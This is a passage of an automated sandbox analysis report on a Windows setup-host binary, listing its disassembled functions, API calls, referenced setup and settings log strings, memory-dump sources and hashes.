                                                                                                                        • Opcode Fuzzy Hash: 5ef35065991bc72738f7ef94b9e5751db236058d8f9aeb1976e0af83dad94b93
                                                                                                                        • Instruction Fuzzy Hash: C7614C71E08309ABCF149FA5EC98AEEBFB9FF5C305F14441AE805E2290D7749905DB60
                                                                                                                        Function 00549A8F Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 184registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegCreateKeyExW.KERNEL32(80000002,00000425,00000000,00000000,00000000,000F003F,00000000,?,00000000,00000001,00000000,00000000,?,00000000,00000000,00000000), ref: 00549AC7
                                                                                                                        • RegCreateKeyExW.KERNEL32(000F003F,00000015,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00549AFC
                                                                                                                        • RegCreateKeyExW.KERNEL32(00000000,0000021D,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00549B20
                                                                                                                        • RegSetValueExW.KERNEL32(?,ETag,00000000,00000001,?,00000000), ref: 00549B57
                                                                                                                        • RegSetValueExW.KERNEL32(?,RefreshInterval,00000000,00000004,0000000D,00000004), ref: 00549B78
                                                                                                                        • RegDeleteTreeW.ADVAPI32(?,Settings), ref: 00549B90
                                                                                                                        • RegCreateKeyExW.KERNEL32(?,Settings,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00549BBE
                                                                                                                        • RegDeleteTreeW.ADVAPI32(?,QueryParameters), ref: 00549BEA
                                                                                                                        • RegCreateKeyExW.KERNEL32(?,QueryParameters,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 00549C11
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00549C53
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00549C61
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00549C6F
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00549C7D
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00549C8B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreate$DeleteTreeValue
                                                                                                                        • String ID: ETag$QueryParameters$RefreshInterval$Settings
                                                                                                                        • API String ID: 4213054534-3134423153
                                                                                                                        • Opcode ID: 3b8aad682af26e2dec92b575f70a3ddc4603fcf38380fd935799c57e677e9c87
                                                                                                                        • Instruction ID: 1492bcd058953f3fe1f44b766ee6dff2b9c76b5ca6317f5f34083060b0e1f723
                                                                                                                        • Opcode Fuzzy Hash: 3b8aad682af26e2dec92b575f70a3ddc4603fcf38380fd935799c57e677e9c87
                                                                                                                        • Instruction Fuzzy Hash: EF518F72D0161EFFCB219B94DC96DFFBBBDFB14759B100165F901A6160D7308E009AA0
                                                                                                                        Function 0054901C Relevance: 28.8, APIs: 19, Instructions: 320COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ImpersonateLoggedOnUser.ADVAPI32(00000001,00000001,00000000,00000000,00000001,00000000), ref: 0054906B
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001), ref: 00549075
                                                                                                                        • WinHttpGetIEProxyConfigForCurrentUser.WINHTTP(?,00000000,00000001,00000000), ref: 005490A4
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001,00000000), ref: 005490AE
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001,00000000), ref: 005490B9
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001,00000000), ref: 005490EC
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0054912B
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0054913E
                                                                                                                        • WinHttpGetProxyForUrl.WINHTTP(00000000,00000000,?,?), ref: 00549158
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 005491FB
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00549211
                                                                                                                        • WinHttpSetOption.WINHTTP(00000000,00000026,?,0000000C), ref: 0054923C
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00549296
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 005492A9
                                                                                                                        • WinHttpGetDefaultProxyConfiguration.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001), ref: 005492B7
                                                                                                                        • wcsrchr.MSVCRT ref: 0054937D
                                                                                                                        • RevertToSelf.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001,00000000), ref: 005493A8
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001,00000000), ref: 005493B6
                                                                                                                        • ExitProcess.KERNEL32 ref: 005493BD
                                                                                                                          • Part of subcall function 00548F32: WTSGetActiveConsoleSessionId.KERNEL32(?,00000001,00000000,00000001,00000000,00000000,00000001,00000000), ref: 00548F42
                                                                                                                          • Part of subcall function 00548F32: WTSQueryUserToken.WTSAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3), ref: 00548F63
                                                                                                                          • Part of subcall function 00548F32: WTSEnumerateSessionsW.WTSAPI32(00000000,00000000,00000001,?,?), ref: 00548F79
                                                                                                                          • Part of subcall function 00548F32: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001,00000000), ref: 00548F83
                                                                                                                          • Part of subcall function 00548F32: CloseHandle.KERNEL32(00000000), ref: 00548FFE
                                                                                                                          • Part of subcall function 00548F32: WTSFreeMemory.WTSAPI32(?), ref: 0054900D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$ErrorGlobalLast$Http$ProxyUser$ActiveCloseConfigConfigurationConsoleCurrentDefaultEnumerateExitHandleImpersonateLoggedMemoryOptionProcessQueryRevertSelfSessionSessionsTokenwcsrchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1916705276-0
                                                                                                                        • Opcode ID: 797564fd99ed06d74b681a8525e42d5bfb758780515ac04337b486d0e6256e9c
                                                                                                                        • Instruction ID: 90380a07d96891d800cb20b749cb77caff605e7ce21ff04aa2d1b8ff9bee9066
                                                                                                                        • Opcode Fuzzy Hash: 797564fd99ed06d74b681a8525e42d5bfb758780515ac04337b486d0e6256e9c
                                                                                                                        • Instruction Fuzzy Hash: 97B1E136A0420AABDF259FA4D81A7EFBFB1FF25B59F044424D806E7290E7718D44C7A1
                                                                                                                        Function 005494C6 Relevance: 28.7, APIs: 19, Instructions: 170memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00549436: GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000001,00000000,00000000,00000001,00000001,?,005494E2,00000001,00000000,00000001,00000000,00000000), ref: 00549486
                                                                                                                          • Part of subcall function 00549436: HeapAlloc.KERNEL32(00000000,?,005494E2,00000001,00000000,00000001,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0054948D
                                                                                                                          • Part of subcall function 00549436: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000001,?,005494E2,00000001,00000000,00000001,00000000,00000000), ref: 005494B0
                                                                                                                          • Part of subcall function 00549436: HeapFree.KERNEL32(00000000,?,005494E2,00000001,00000000,00000001,00000000,00000000,?,?,00000000,00000000,00000000), ref: 005494B7
                                                                                                                        • WinHttpSendRequest.WINHTTP(?,00000000,000000FF,00000000,00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,?,?,00000000,00000000), ref: 005494FA
                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00000000,00000000), ref: 00549504
                                                                                                                        • WinHttpReceiveResponse.WINHTTP(?,00000000,?,?,00000000,00000000,00000000), ref: 00549527
                                                                                                                        • WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000), ref: 0054954C
                                                                                                                        • WinHttpQueryHeaders.WINHTTP(?,00000036,00000000,00000000,00000004,00000000,?,?,00000000), ref: 00549575
                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 0054957F
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000004,?,?,00000000), ref: 00549593
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0054959A
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000001,00000000,00000001,00000000,00000000,?,?,00000000,00000000), ref: 005496A8
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000000), ref: 005496AF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$HttpProcess$AllocErrorFreeHeadersLastQuery$ReceiveRequestResponseSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4147306657-0
                                                                                                                        • Opcode ID: cc5b98dbbd51ead1341e401805ae92fc26f4529ab7886b5079ef283c7648280e
                                                                                                                        • Instruction ID: 69f67d5fc7cb07f77184493ca88b34ce59f315afcc80d7fd69aed62138e370f5
                                                                                                                        • Opcode Fuzzy Hash: cc5b98dbbd51ead1341e401805ae92fc26f4529ab7886b5079ef283c7648280e
                                                                                                                        • Instruction Fuzzy Hash: F051817590420AFBEB218BA1DC59BEBBEACBF14316F114565F901E6190D7709E04AB60
                                                                                                                        Function 004EBAED Relevance: 25.2, APIs: 1, Strings: 13, Instructions: 727COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004EBAF4
                                                                                                                          • Part of subcall function 004F8A19: __EH_prolog3.LIBCMT ref: 004F8A20
                                                                                                                        Strings
                                                                                                                        • MediaSetupUIMgr.dll, xrefs: 004EBC7E
                                                                                                                        • SetupHost: Automation initialization failed: [0x%X], xrefs: 004EBF90
                                                                                                                        • CSetupHost::InitializeComponents, xrefs: 004EC37E
                                                                                                                        • SetupHost: Automation information initialized., xrefs: 004EBEB4
                                                                                                                        • SetupHost: Automation information not found. Releasing automation object., xrefs: 004EBEE7
                                                                                                                        • SetupHost::InitializeComponents, xrefs: 004EBB30
                                                                                                                        • SetupHost: Loading AutomationManager manager..., xrefs: 004EBD36
                                                                                                                        • SetupHost: Initializing automation..., xrefs: 004EBE4E
                                                                                                                        • SetupHost: Looking for automation file..., xrefs: 004EBDA2
                                                                                                                        • SetupCore.dll, xrefs: 004EBCE4, 004EBD63
                                                                                                                        • SetupHost: Using automation file: [%s]..., xrefs: 004EBE18
                                                                                                                        • SetupHost: OneSettings initialization failed: [0x%X], xrefs: 004EBF4A
                                                                                                                        • SetupMgr.dll, xrefs: 004EBF6F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID: CSetupHost::InitializeComponents$MediaSetupUIMgr.dll$SetupCore.dll$SetupHost: Automation information initialized.$SetupHost: Automation information not found. Releasing automation object.$SetupHost: Automation initialization failed: [0x%X]$SetupHost: Initializing automation...$SetupHost: Loading AutomationManager manager...$SetupHost: Looking for automation file...$SetupHost: OneSettings initialization failed: [0x%X]$SetupHost: Using automation file: [%s]...$SetupHost::InitializeComponents$SetupMgr.dll
                                                                                                                        • API String ID: 431132790-311080171
                                                                                                                        • Opcode ID: f72d01ac9a946892c84754547dd48622dc8ad48537b7c9a153ab1a536f0b44a7
                                                                                                                        • Instruction ID: 86da58f3734d76deef9bf48fa477bc3749055ca62157569dee4c87366246f9b2
                                                                                                                        • Opcode Fuzzy Hash: f72d01ac9a946892c84754547dd48622dc8ad48537b7c9a153ab1a536f0b44a7
                                                                                                                        • Instruction Fuzzy Hash: 0842A2757006118BCF059F65D8A8A2E7762EF8C312F19446BED069B391DF38EC02DB99
                                                                                                                        Function 004F7FB1 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 260memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000680,0000001C,004EB1D8,00000008,00000000), ref: 004F807E
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004F8085
                                                                                                                          • Part of subcall function 004FA6C1: __EH_prolog3_GS.LIBCMT ref: 004FA6CB
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 004F820D
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 004F8214
                                                                                                                          • Part of subcall function 004F8A19: __EH_prolog3.LIBCMT ref: 004F8A20
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004F7FB8
                                                                                                                          • Part of subcall function 004F9B21: GetProcessHeap.KERNEL32(00000000,?,004E7D2F), ref: 004F9B2B
                                                                                                                          • Part of subcall function 004F9B21: HeapFree.KERNEL32(00000000), ref: 004F9B32
                                                                                                                          • Part of subcall function 0054B274: NtQueryLicenseValue.NTDLL(00553190,00000000,00000000,00000004,00000000), ref: 0054B320
                                                                                                                        Strings
                                                                                                                        • %s=%s, xrefs: 004F81B0
                                                                                                                        • CMoSetupOneSettingsHelperT<class CEmptyType>::InitializeSettings, xrefs: 004F8013, 004F80EA, 004F819E
                                                                                                                        • %s;%s=%s, xrefs: 004F817F
                                                                                                                        • OneSettings: Initialization succeeded, but no values found., xrefs: 004F8251
                                                                                                                        • OneSettings: Initialization succeeded, found %d values., xrefs: 004F8231
                                                                                                                        • OneSettings: Blocked by policy settings., xrefs: 004F8289
                                                                                                                        • OneSettings: Initialization failed -> [0x%X], xrefs: 004F8263
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$FreeH_prolog3$AllocH_prolog3_LicenseQueryValue
                                                                                                                        • String ID: %s;%s=%s$%s=%s$CMoSetupOneSettingsHelperT<class CEmptyType>::InitializeSettings$OneSettings: Blocked by policy settings.$OneSettings: Initialization failed -> [0x%X]$OneSettings: Initialization succeeded, but no values found.$OneSettings: Initialization succeeded, found %d values.
                                                                                                                        • API String ID: 4122440011-3034588626
                                                                                                                        • Opcode ID: 4d63c2a0f02d05389fc00308550732c7ac50a7e0dee02730f94c20962a9fc9ef
                                                                                                                        • Instruction ID: 128524762a5b9cd83d83d60bac6a7df58dc7c0600babe30fe9ec9ca3f39a858d
                                                                                                                        • Opcode Fuzzy Hash: 4d63c2a0f02d05389fc00308550732c7ac50a7e0dee02730f94c20962a9fc9ef
                                                                                                                        • Instruction Fuzzy Hash: E1A16070A0020A9BDF14DFA5C996BBE77B4BF44304F14445EEA05AF285DF78D901CBA9
                                                                                                                        Function 0054290C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 97libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetVersion.KERNEL32 ref: 0054294F
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32), ref: 005429C3
                                                                                                                        • GetProcAddress.KERNEL32(00000000,AddVectoredExceptionHandler), ref: 005429D3
                                                                                                                        • memset.MSVCRT ref: 00542A87
                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(%windir%\system32\dbghelp.dll,?,00000104), ref: 00542AA0
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00542AB3
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00542AC8
                                                                                                                        • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 00542AD6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProc$EnvironmentExpandFreeHandleLoadModuleStringsVersionmemset
                                                                                                                        • String ID: %windir%\system32\dbghelp.dll$AddVectoredExceptionHandler$MiniDumpWriteDump$kernel32
                                                                                                                        • API String ID: 997276966-3676913557
                                                                                                                        • Opcode ID: 4f3d23f8495d61dd7cdeb5c7c035987d725cffb9b632a061f48db4418eab980f
                                                                                                                        • Instruction ID: 37458eab2546af16f5250028513368a4b3b30e226a295adde306c18b01fb427a
                                                                                                                        • Opcode Fuzzy Hash: 4f3d23f8495d61dd7cdeb5c7c035987d725cffb9b632a061f48db4418eab980f
                                                                                                                        • Instruction Fuzzy Hash: 6741D0B85063A49FCB109F61EC6A69B3EE8B72474EFD04519B8059B260D7F0954CEF90
                                                                                                                        Function 00540B44 Relevance: 19.6, APIs: 13, Instructions: 97memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TlsGetValue.KERNEL32(005526B8,00000010,00540CDD), ref: 00540B5D
                                                                                                                        • EnterCriticalSection.KERNEL32(005566F8), ref: 00540B75
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000004), ref: 00540B89
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00540B90
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000006), ref: 00540BD5
                                                                                                                        • HeapReAlloc.KERNEL32(00000000), ref: 00540BDC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00008010), ref: 00540C05
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00540C0C
                                                                                                                        • TlsSetValue.KERNEL32(00000000), ref: 00540C2F
                                                                                                                        • LeaveCriticalSection.KERNEL32(005566F8), ref: 00540C92
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocCriticalSectionValue$AllocateEnterLeave
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 137540307-0
                                                                                                                        • Opcode ID: bfb78a18ed119b4965184bb20a18e21c2957031b116dacd13f57df7e0df61f92
                                                                                                                        • Instruction ID: dcb7c709f0d19bcd538503de63b73c2283b9909e8e82d932590ff1cb7d21e7c0
                                                                                                                        • Opcode Fuzzy Hash: bfb78a18ed119b4965184bb20a18e21c2957031b116dacd13f57df7e0df61f92
                                                                                                                        • Instruction Fuzzy Hash: AB319078506384DFC7219F64ECA9A6EBFB9FB68B47B50412DE905932A0CB714809FF10
                                                                                                                        Function 004FF51A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 108memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(00000057,?,00000000), ref: 004FF667
                                                                                                                          • Part of subcall function 004FE347: GetFileAttributesW.KERNEL32(00000000,?,00000000,00000000,004FF550,?,00000000), ref: 004FE367
                                                                                                                          • Part of subcall function 004FE347: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 004FE38E
                                                                                                                          • Part of subcall function 004FE347: HeapFree.KERNEL32(00000000,?,00000000), ref: 004FE395
                                                                                                                          • Part of subcall function 004FE347: SetLastError.KERNEL32(00000000,?,00000000), ref: 004FE3A6
                                                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,00000000), ref: 004FF599
                                                                                                                        • VerQueryValueW.VERSION(?,?,?,00000004,?,?,?,?,00000000), ref: 004FF603
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 004FF632
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 004FF639
                                                                                                                          • Part of subcall function 004FE595: _vsnwprintf.MSVCRT ref: 004FE5C7
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 004FF641
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 004FF652
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000), ref: 004FF65B
                                                                                                                          • Part of subcall function 004FF496: GetFileVersionInfoSizeExW.KERNELBASE(00000003,?,00000000,?,00000000,?,00000000), ref: 004FF4B0
                                                                                                                          • Part of subcall function 004FF496: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,00000000), ref: 004FF4C1
                                                                                                                          • Part of subcall function 004FF496: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 004FF4C8
                                                                                                                          • Part of subcall function 004FF496: GetFileVersionInfoExW.KERNELBASE(00000003,?,00000000,?,00000000,?,00000000), ref: 004FF4E0
                                                                                                                          • Part of subcall function 004FF496: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 004FF506
                                                                                                                          • Part of subcall function 004FF496: HeapFree.KERNEL32(00000000,?,00000000), ref: 004FF50D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$ErrorLast$Process$FileFree$InfoQueryValueVersion$AllocAttributesSize_vsnwprintf
                                                                                                                        • String ID: FileVersion$\StringFileInfo\%04X%04X\%s$\VarFileInfo\Translation
                                                                                                                        • API String ID: 4187551046-3407502573
                                                                                                                        • Opcode ID: dec604e0c0865b1bbe6c6d71c347372d9c71811f0b17859a105fe8380593dffd
                                                                                                                        • Instruction ID: 1ab35fb89ec76765b158664df042787a8f4c28346c60b15a97147f7092adddc0
                                                                                                                        • Opcode Fuzzy Hash: dec604e0c0865b1bbe6c6d71c347372d9c71811f0b17859a105fe8380593dffd
                                                                                                                        • Instruction Fuzzy Hash: F731FD31A4031D9BDB209B609C88BFB7378EF28706F0004BBE605D6260DF749D4A9F65
                                                                                                                        Function 004FC159 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 181COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • %u.%u.%s, xrefs: 004FC26C
                                                                                                                        • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004FC2D9
                                                                                                                        • OneSettings: Failed to update UBR: [0x%X], xrefs: 004FC374
                                                                                                                        • CMoSetupOneSettingsHelperT<class CEmptyType>::GetOsVer, xrefs: 004FC1D9, 004FC20C, 004FC2AE
                                                                                                                        • UBR, xrefs: 004FC2D4
                                                                                                                        • OneSettings: Failed to get UBR: [0x%X], xrefs: 004FC333
                                                                                                                        • CMoSetupOneSettingsHelperT<class CEmptyType>::GetUBR, xrefs: 004FC2FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3_memset
                                                                                                                        • String ID: %u.%u.%s$CMoSetupOneSettingsHelperT<class CEmptyType>::GetOsVer$CMoSetupOneSettingsHelperT<class CEmptyType>::GetUBR$OneSettings: Failed to get UBR: [0x%X]$OneSettings: Failed to update UBR: [0x%X]$SOFTWARE\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                        • API String ID: 2828583354-2934946344
                                                                                                                        • Opcode ID: 6a1494fd8eb4435916cfc5508ae18e6a1b6e389571cade5df53326b74aaf5535
                                                                                                                        • Instruction ID: 9deca255a6137cbbfc1f91b839cc959c7fd5c06d5e7648bef3f1bfb5a5f681c5
                                                                                                                        • Opcode Fuzzy Hash: 6a1494fd8eb4435916cfc5508ae18e6a1b6e389571cade5df53326b74aaf5535
